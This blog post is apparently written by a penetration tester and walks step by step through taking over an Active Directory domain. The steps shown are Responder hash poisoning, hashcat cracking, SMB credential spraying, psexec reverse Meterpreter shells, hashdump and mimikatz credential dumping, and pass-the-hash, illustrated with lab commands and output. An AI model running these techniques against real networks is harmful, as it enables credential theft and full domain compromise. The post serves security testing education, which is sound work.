Hunt for the Domain Admin (DA)

Ok this is a quick intro into how the DA account can be captured during pentests. Over 85% of the tests that I have completed this processes I’m going to document has resulted in collecting accounts with DA privileges.


Just for the record, authentication with DA rights should not be used apart from to set up a domain, and administer it once all else has failed and the shit has hit the fan.


Admins should instead use a delegation of privileges model which can be read in more detail here https://technet.microsoft.com/en-us/library/cc754542(v=ws.11).aspx and here https://technet.microsoft.com/en-us/library/2007.02.activedirectory.aspx the reality is most IT administered environments issues admins with DA rights so they can change users passwords and install programs. This level of rights is not required for such tasks and this free allocation of the DA rights results in pentesters or any potential attackers in getting access to your highest privileged accounts.

Lecture over quick flow of each stage.

1.    Collection of standard user domain credentials. (Password hashes)
2.    Cracking standard user domain credentials. (Password hashes)
3.    Using standard user domain credentials to identify misconfigured local network services.
4.    Access to local admin account.
5.    Enumeration of users with DA rights.
6.    Access to machines with authenticated DA right users.
7.    Post exploitation to reveal authenticated users passwords.
8.    Access to local domain controller (DC) using collected DA account.
9.    Clone all hashes off the DC.

Detailed flow of each stage. (Note Nessus and Nmap are not used at any point) Nothing against any tool but vuln and port scans will not aid you in getting DA for around 99% of the time.

•    Collection of standard user domain credentials. (Password hashes)

Responder – Amazing tool, every internal pentest I do following plugging in my laptop, I fire up responder and wait.

https://github.com/lgandx/Responder.git

Responder is built into Kali as we all know but you will be missing the updates so personally I just clone it direct from GIT.

[Thu Feb 16 09:06:18] root@kali:~ # git clone https://github.com/lgandx/Responder.git

Cloning into 'Responder'...

remote: Counting objects: 874, done.
remote: Total 874 (delta 0), reused 0 (delta 0), pack-reused 874
Receiving objects: 100% (874/874), 538.71 KiB | 539.00 KiB/s, done.
Resolving deltas: 100% (571/571), done.
Checking connectivity... done.

[Thu Feb 16 09:06:33] root@kali:~ # cd Responder/

How to start Responder

[Thu Feb 16 09:07:22] root@kali:~/Responder # python Responder.py -I eth0 -w -r -f
__
.----.-----.-----.-----.-----.-----.--|  |.-----.----.
|   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
|__| |_____|_____|   __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 2.3

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CRTL-C

[+] Poisoners:
LLMNR                      [ON]
NBT-NS                     [ON]
DNS/MDNS                   [ON]

[+] Servers:
HTTP server                [ON]
HTTPS server               [ON]
WPAD proxy                 [ON]
SMB server                 [ON]
Kerberos server            [ON]
SQL server                 [ON]
FTP server                 [ON]
IMAP server                [ON]
POP3 server                [ON]
SMTP server                [ON]
DNS server                 [ON]
LDAP server                [ON]

[+] HTTP Options:
Always serving EXE         [OFF]
Serving EXE                [OFF]
Serving HTML               [OFF]
Upstream Proxy             [OFF]

[+] Poisoning Options:
Analyze Mode               [OFF]
Force WPAD auth            [OFF]
Force Basic Auth           [OFF]
Force LM downgrade         [OFF]
Fingerprint hosts          [ON]

[+] Generic Options:
Responder NIC              [eth0]
Responder IP               [192.168.1.5]
Challenge set              [1122334455667788]

[+] Listening for events...

Now wait for hashes, below shows a collected hash.

[SMB] NTLMv2-SSP Client   : 192.168.1.3
[SMB] NTLMv2-SSP Username : IE11WIN7\IEUser
[SMB] NTLMv2-SSP Hash     : IEUser::IE11WIN7:1122334455667788:D3F4B5D0F081F43AE71A46ED64BA5A98:010100000000000002BDBCAA3488D2018198E251A2557E870000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D0042003100320008003000300000000000000001000000002000000476FD373573469EF2188CA9C996B02FC9E4AEC547831E0169BE7ADBC44F16310A001000000000000000000000000000000000000900200063006900660073002F003100390032002E003100360038002E0031002E0035000000000000000000

The machine used to collect this hash is from my own VM lab, which are created from default machines from here https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

You can copy and paste the above hash into a notepad or find the collected hashes in the Responder/logs directory

[Thu Feb 16 09:13:45] root@kali:~/Responder/logs # more SMB-NTLMv2-SSP-192.168.1.3.txt
IEUser::IE11WIN7:1122334455667788:D3F4B5D0F081F43AE71A46ED64BA5A98:010100000000000002BDBCAA3488D2018198E251A2557E870000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D004200310032000300
0A0053004D0042003100320005000A0053004D0042003100320008003000300000000000000001000000002000000476FD373573469EF2188CA9C996B02FC9E4AEC547831E0169BE7ADBC44F16310A00100000000000000000000000000000000000090020006300690
0660073002F003100390032002E003100360038002E0031002E0035000000000000000000

So you have hashes from domain users now it’s time to crack them.

•    Cracking standard user domain credentials. (Password hashes)

Rocktastic was created to replicate domain user’s password choices im not going to hammer on about it much apart from I created it and I am proud of it. Read about it here https://myexploit.wordpress.com/2015/06/13/rocktastic-one-billion-unique-word-combination-password-dictionary/ or here https://labs.nettitude.com/tools/rocktastic/

You can download it here https://labs.nettitude.com/tools/rocktastic/ or https://docs.google.com/uc?id=0Bx3odaY_Hs9oaGZuTGJnMG9lUUU&export=download

I now use hashcat to crack passwords, I used to use John if you do use John you need to use the 64bit version because the 32bit will not accept password lists that are over a certain size.

Hashcat switches

NTLMv2 -m 5600
NTLMv1 -m 5500

cudaHashcat64.exe -m 5600 C:\Users\test\User_Hashes.txt C:\Users\test\Wordlists\Rocktastic12a  --outfile=C:\Users\test\Hashes1CrackedTest1.txt --potfile-disable

Credentials cracked now to use them.

Using standard user domain credentials to identify misconfigured local network services.

For this I use metasploit with the auxiliary/scanner/smb/smb_login module and the following switches.

set SMBDomain The-Domain-Name
set SMBUser The-Cracked-Users-Domain-Username
set SMBPass The-Cracked-Users-Domain-Password
set RHOSTS 192.168.0.0/24 Change-as-required
set threads 20
run

This will then spray the subnet attempting to authenticate with any machines in the subnet using SMB. While any authenticated machines are interesting it’s the positive authentication followed with the word Administrator that is of most interest, see below.

[+] 192.168.0.22:445 SMB - Success: 'TestDomain\IEUser:Passw0rd1' Administrator

This means the account has local admin privileges on this machine and you can use exploit/windows/smb/psexec with it.

•    Access to local admin account.

Using psexec in metasploit use the following switches

msf auxiliary(smb_login) > use exploit/windows/smb/psexec

set SMBDomain The-Domain-Name
set SMBUser The-Cracked-Users-Domain-Username
set SMBPass The-Cracked-Users-Domain-Password
set RHOST 192.168.0.22 Change-as-required
run

Typically this fails and requires to be run twice, so don’t give up if it fails 1st time.

If you want to lab this you need to tweak the reg on a windows 7 box the following requires to be run on an administrator privileged CMD session

reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V LocalAccountTokenFilterPolicy /t REG_DWORD /d 1

Following that psexec will work.

Before the above reg tweak

msf exploit(psexec) > run

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] 192.168.1.3:445 - Connecting to the server...
[*] 192.168.1.3:445 - Authenticating to 192.168.1.3:445 as user 'IEUser'...
[-] 192.168.1.3:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
[*] Exploit completed, but no session was created.

After the reg tweak

msf exploit(psexec) > run

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] 192.168.1.3:445 - Connecting to the server...
[*] 192.168.1.3:445 - Authenticating to 192.168.1.3:445 as user 'IEUser'...
[*] 192.168.1.3:445 - Selecting PowerShell target
[*] 192.168.1.3:445 - Executing the payload...
[+] 192.168.1.3:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.3:49187) at 2017-02-16 09:53:43 +0000

Here is a vid of using Psexec mass sprayer https://www.youtube.com/watch?v=YI2ycgj9QvQ kind of wrong but also very cool, the script is by https://raw.githubusercontent.com/darkoperator/Meterpreter-Scripts/master/auxiliary/scanner/smb/psexec_scanner.rb

Ok so once you have a session via psexec you can use post exploit scripts. https://www.youtube.com/watch?v=dFYnfeE-alA the most useful ones are

run post/windows/gather/hashdump

run post/windows/gather/credentials/sso

run post/windows/gather/cachedump

Hashdump will give you the local admin hashes, SSO is mimikatz and cachedump will reveal the past 16 logged on users names and password hashes, this you have to then go on to crack and takes ages but can be used as a backup as it commonly contains admin accounts!

I use John for cachedump it takes ages, you can use Hashcat but takes some googling to work out how to format the hashes, and as I don’t commonly require to do this I don’t keep notes on it.

john --wordlist=/root/Desktop/Password/Rocktastic.txt --format=mscash /root/Crackedpasswords

Below shows output from hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::

Once you have the hash from hashdump you then need to repeat the smb_login stage but this time using the local admin hash.

Windows does not salt passwords, and because people commonly clone machines password hashes on a clone’s windows box will be the same as the original machine.

NOTE – try the Administrator account but also try all the other accounts in the hashdump after as I commonly find the Administrator account is disabled or only works on a few other machines were a different account may work on almost all the local machines. Local accounts set up for AV are a common culprit for this bad practise.

You don’t need to crack the local admin hashes as Windows will accept the hash. Just drop the ::: off the end see below.

auxiliary/scanner/smb/smb_login module and the following switches.

set SMBDomain WORKGROUP (Important that you change the domain back to workgroup because your now using the local admin hash not a domain account)
set SMBUser IEUser (Or whatever they named the account to)
set SMBPass aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889
set RHOSTS 192.168.0.0/24 Change-as-required
set threads 20
run

Once you run this you should then see a lot more machines with Administrator after them meaning you can then access them with Psexec.

•    Enumeration of users with DA rights.

The local admin hashes from one box commonly gives you access to a lot of the machines, you can Psexec to them all and collect all the local admin hashes as sometimes I find you will see different accounts which intern give you access to machines you didn’t have access to before and so on, but at this point I commonly use smbexec to hunt out users with DA rights.

https://github.com/pentestgeek/smbexec

Kali is fragile and any installed program increases the risk of braking it. I found the following helps fix ruby issues following the install of smbexec

root@kali:/opt/smbexec# smbexec
cannot load such file -- nmap/xml

Load error: Make sure the Ruby gems are installed properly, run bundle install

/opt/smbexec# apt-get install ruby-dev
/opt/smbexec# bundle install

1.) Download SMBExec 2.0 (https://github.com/brav0hax/smbexec)
cd /opt
git clone https://github.com/brav0hax/smbexec.git

2.) Install the mingw32 packages (http://www.mingw.org/)
apt-get install mingw32

3.) Change to /opt/smbexec
./install.sh
(Choose Option 1 for KALI Linux 2.0)

4.) Get Version 1.0 of NTDSXtract (http://www.ntdsxtract.com/)
wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

5.) Remove the installed Version (1.3.3) of NTDSXtract
cd /opt
rm -rf NTDSXract
unzip ntdstract_v1_0.zip
mv “NTDSXtract 1.0” NTDSXtract

Now it should be ready to run.

[Thu Feb 16 10:02:55] root@kali:~ # smbexec
[*] Checking if all external dependancies exist...

winexe version 1.1
This program may be freely redistributed under the terms of the GNU GPLv3
[!] /opt/esedbtools/esedbexport does not exists, functionality may break. Update smbexec.yml with correct path.

Press enter to continue

**********************************************************************
*                    smbexec 2.0 - Machiavellian                     *
**********************************************************************

Main Menu

1. System Enumeration                              No hosts identified
2. System Exploitation                         No credentials provided
3. Obtain Hashes                                      No pass provided
4. Options
5. Exit

Choice : 1

**********************************************************************
*                    smbexec 2.0 - Machiavellian                     *
**********************************************************************

System Enumeration Menu

1. Create a host list                              No hosts identified
2. Check systems for Domain Admin              No credentials provided
3. Check systems for logged in users                  No pass provided
4. Check systems for UAC
5. Enumerate Shares
6. File Finder
7. Remote login validation
8. Main menu

Choice : 2

Identify Domain Admin processes/logins.

Target IP, host list, or nmap XML file [No hosts identified] : 192.168.0.0/24
Username [No credentials provided] : IEUser
Password or hash (<LM>:<NTLM>) [No pass provided] : aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889
Domain [LOCALHOST] : (Just press enter)

Domain Admins Status

And wait while it scans the subnet using the local admin creds. If any users with DA rights are authenticated on a machine that you can access with the local admin account it will show you.

This commonly is the case and does not require you to crack the local admin password, which is great.

OK so once you found a user or two with DA rights.

•    Access to machines with authenticated DA right users.

Psexec to that machine and use mimikatz

msf exploit(psexec) > set rhost 192.168.1.3
rhost => 192.168.1.3
msf exploit(psexec) > set smbuser IEUser
smbuser => IEUser
msf exploit(psexec) > set smbpass Passw0rd!
smbpass => Passw0rd!
msf exploit(psexec) > run

Using mimikatz via the SSO post script

meterpreter > run post/windows/gather/credentials/sso

[*] Running module against IE11WIN7
Windows SSO Credentials
=======================

AuthID   Package  Domain    User    Password
------   -------  ------    ----    --------
0;89998  NTLM     IE11WIN7  IEUser  Passw0rd!
0;89998  NTLM     IE11WIN7  IEUser
0;91060  NTLM     IE11WIN7  IEUser  Passw0rd!
0;91060  NTLM     IE11WIN7  IEUser

And there you go you’re now the owner of a shiny DA account!

You can now psexec to the DC using the DA account, or RDP to it. To hunt out the DC drop down to a CMD shell and run ipconfig /all and look at the DNS Servers as these typically in a domain are the DC. Reason for this is when you create active directory services it offers you the chance to create a DNS service and as most people simply type dcpromo followed by pressing next, next, next as many times as they can resulting in a default build of the DC with DNS services enabled. ;0)

Hope this helped.

Quick tool flow of each stage.

1. Collection of standard user domain credentials. Responder
2. Cracking standard user domain credentials. Hashcat / Rocktastic
3. Using standard user domain credentials to identify misconfigured local network services. MSF / SMB_Login
4. Access to local admin account. MSF Hashdump
5. Enumeration of users with DA rights. SMBexec
6. Access to machines with authenticated DA right users. MSF / PSEXEC
7. Post exploitation to reveal authenticated users passwords. MSF / mimikatz
8. Access to local domain controller (DC) using collected DA account. MSF / PSEXEC or RDP
9. Clone all hashes off the DC. MSF / Hashdump

Advertisements